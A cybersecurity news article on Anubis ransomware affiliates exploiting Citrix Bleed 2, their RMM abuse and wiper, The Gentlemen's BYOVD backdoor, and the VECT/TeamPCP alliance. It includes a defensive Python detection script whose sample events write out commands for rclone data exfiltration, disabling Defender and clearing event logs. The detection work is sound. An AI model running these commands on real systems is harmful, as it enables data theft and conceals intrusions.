
Anubis Ransomware Exploits Citrix Bleed 2 for Initial Access


Anubis ransomware campaigns are known to exploit the Citrix Bleed 2 vulnerability as an initial access vector. Citrix Bleed 2 is tracked as CVE-2025-5777 and carries a CVSS score of 9.3.

The attacks follow a familiar pattern. Affiliates use legitimate remote access tools, steal credentials, move laterally, and deploy ransomware. But the details reveal how ransomware operations are becoming more industrialized.

Arctic Wolf documented the campaign. The firm found that affiliates repeatedly abused legitimate remote access tools to blend in with normal IT activity while maintaining control of victim systems.

Who Is Anubis?

Anubis is a ransomware-as-a-service group that emerged in late 2024 as a rebrand of Sphinx. The operation was formally announced on the RAMP underground forum in February 2025.

The group has claimed 91 victims on its data leak site. Eleven victims were reported in June 2026 alone. Targets range from healthcare to business services, manufacturing, technology, and financial services sectors. More than half of the targets are drawn from the U.S., followed by the U.K., Australia, France, and Canada.

Anubis runs a generous affiliate program that pays affiliates 80% of the ransoms collected. It also includes an irreversible data-wiping feature that adds pressure on victims. When the wipe module is activated, files remain in their directories but are reduced to zero bytes. The knowledge that the threat actors can reduce an environment to that scorched-earth state significantly increases the pressure on victims to pay before the wiper is fully activated.

The Attack Chain

The Anubis ransomware Citrix Bleed 2 exploitation campaign involves multiple stages.

Initial Access:

Access is gained by using the following two methods:
1. CVE-2025-5777 vulnerability in Citrix NetScaler ADC and Gateway
2. Secure VPN logon credentials obtained through multiple sources

It is not clear where the VPN credentials came from. They may have been obtained through a prior compromise, from initial access brokers, via credential stuffing, or from information stealers. Valid Cisco AnyConnect logons were observed originating from several different hosting-provider ASNs.

Post Exploitation:

The post-exploitation process involves gaining entry via RDP and SMB and then using this entry point for credential access, PsExec service creation, RMM deployment, and cloud transfer.

Lateral Movement:

Lateral movement is performed using RDP and PsExec. The attackers install RMM tools to maintain persistence, including ScreenConnect, Zoho Assist, MeshAgent, Remotely, UltraVNC, and Total Software Deployment. In some cases, Cloudflare Tunnel is configured to provide encrypted tunnels into the environment.

Credential Access and Exfiltration:

Attackers harvest credentials to extend their access. Tools such as S3 Browser, rclone, s5cmd, WinSCP, and PuTTY are installed to exfiltrate data before the ransomware is deployed.

Defense Evasion:

Several techniques are used to hinder system defenses and complicate post-incident investigation. Observed activity includes disabling Windows Defender real-time protection, running SophosUninstall and PCHunter, and deleting logs on several machines.

In at least one intrusion, the Anubis encryptor was deleted after execution, reducing the availability of on-disk payload artifacts for later analysis.
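The stages above name specific tools and actions that a defender can hunt for in endpoint telemetry. As an added example (not from the article or from Arctic Wolf), the following Python correlates constructed process-creation events by host and flags hosts where more than one attack-chain stage appears; the tool names are taken from the article, while the event format, the patterns, and the alert threshold are assumptions.

```python
import re
from collections import defaultdict

# Process names and command-line fragments named in the article, grouped by the
# attack-chain stage they belong to. Matched case-insensitively against
# "<image path> <command line>". Tune to your estate: several of these tools are
# legitimately deployed, so the per-host correlation below, not any single match, is the signal.
STAGE_PATTERNS = {
    "rmm":     r"screenconnect|zoho\s*assist|meshagent|\bremotely\b|ultravnc|total\s*software\s*deployment",
    "exfil":   r"s3\s*browser|\brclone\b|\bs5cmd\b|\bwinscp\b|\bputty\b",
    "psexec":  r"psexesvc|\bpsexec\b",
    "evasion": r"disablerealtimemonitoring|sophosuninstall|pchunter|wevtutil\s+cl\b",
}
COMPILED = {stage: re.compile(pattern) for stage, pattern in STAGE_PATTERNS.items()}

def classify(image, cmdline):
    """Return the set of attack-chain stages a single process-creation event matches."""
    text = f"{image} {cmdline}".lower()
    return {stage for stage, rx in COMPILED.items() if rx.search(text)}

def correlate(events, min_stages=2):
    """Group events by host and report hosts where at least `min_stages` distinct
    stages were observed. Returns {host: sorted list of stage names}."""
    seen = defaultdict(set)
    for host, image, cmdline in events:
        seen[host] |= classify(image, cmdline)
    return {host: sorted(stages) for host, stages in seen.items() if len(stages) >= min_stages}

# Constructed Sysmon-style process-creation events (host, image, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("FS01", r"C:\Windows\PSEXESVC.exe", "PSEXESVC.exe"),
    ("FS01", r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe", ""),
    ("FS01", r"C:\Tools\rclone.exe", r"rclone copy D:\Finance remote:bucket --transfers 16"),
    ("FS01", r"C:\Windows\System32\wevtutil.exe", "wevtutil cl Security"),
    ("WS22", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    ("WS22", r"C:\Program Files\PuTTY\putty.exe", "putty.exe -ssh ops@203.0.113.10"),
    ("WS07", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: {len(stages)} stages observed -> {', '.join(stages)}")
```

A host that trips only one stage (for example an RMM tool the help desk actually uses) is not reported; raise `min_stages` or narrow the patterns to fit your environment.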

The Gentlemen's BYOVD Arsenal

Kaspersky documented a Go-based backdoor used by The Gentlemen ransomware-as-a-service operation. The backdoor supports remote command execution after reconnaissance, lateral movement via Group Policy or PsExec, and defense evasion using BYOVD (bring your own vulnerable driver).

The implant collects system information and exfiltrates it over a bidirectional TCP connection. It then waits for operator commands, which it executes via cmd.exe. A SOCKS proxy capability is also available.

According to Expel, The Gentlemen has also weaponized a zero-day vulnerability in a little-known third-party vendor driver called ktapi.sys. The driver is part of an API developed by Kontron. It grants kernel-level access, bypasses Windows security protections, and kills protected security processes associated with Microsoft, ESET, Palo Alto Networks, and SentinelOne.

Marcus Hutchins, principal threat researcher at Expel, noted: "BYOVD continues to be a huge threat to enterprises, enabling attackers to disable state-of-the-art endpoint security systems in seconds. Even using the latest Windows version, with all exploit mitigations enabled, does not provide complete protection."

The VECT and TeamPCP Partnership

Sophos investigated the partnership between VECT and TeamPCP. The alliance was announced in March 2026 to combine supply chain attack-driven credential theft with ransomware deployment.

The partnership allows VECT to deploy ransomware across all organizations compromised in the Trivy and LiteLLM supply chain attacks. Prior to the VECT partnership, TeamPCP was running another ransomware operation under the CipherForce brand.

Recent analyses found VECT to contain implementation flaws that cause any file larger than 128 KB to be permanently destroyed rather than encrypted. TeamPCP responded, stating they had never used VECT's encryptor in attacks.

Sophos noted that the VECT/TeamPCP alliance represents a meaningful shift in the ransomware threat landscape. The convergence of large-scale supply chain credential theft, a maturing RaaS operation, and mass underground forum mobilization constitutes an unprecedented model of industrialized ransomware deployment.

The Bottom Line

The Anubis ransomware Citrix Bleed 2 exploitation campaign is a case in point: ransomware operations are becoming increasingly sophisticated, combining exploits, legitimate tools, credential harvesting, and defense evasion.

Patch Citrix NetScaler. Monitor for RMM tool abuse. Audit VPN logins. And remember: the ransomware group with a built-in wiper doesn't need your cooperation. It just needs access.

FAQ Section

What is the Anubis ransomware Citrix Bleed 2 exploitation?

It is a campaign where Anubis affiliates exploit CVE-2025-5777 in Citrix NetScaler ADC and Gateway to gain initial access before deploying ransomware.

What is Citrix Bleed 2?

Citrix Bleed 2 is CVE-2025-5777, a critical authentication bypass vulnerability in Citrix NetScaler ADC and Gateway with a CVSS score of 9.3.

How do Anubis affiliates achieve initial access?

They either exploit CVE-2025-5777 or use valid credentials for the organization's VPN, obtained from an initial access broker, through credential stuffing, or from information stealers.

What legitimate tools do attackers abuse?

Attackers abuse RMM tools including ScreenConnect, Zoho Assist, MeshAgent, Remotely, UltraVNC, and Total Software Deployment.

What is the wiper feature in Anubis?

Anubis includes a /WIPEMODE module that reduces files to 0 KB regardless of ransom payment. This increases pressure on victims to pay before the wiper is fully activated.

What is the VECT and TeamPCP partnership?

It is an alliance to combine supply chain credential theft with ransomware deployment. TeamPCP previously operated under the CipherForce brand.

Source: The Hacker News

© 2016 – 2026 Red Secure Tech Ltd. Registered in England and Wales — Company No: 15581067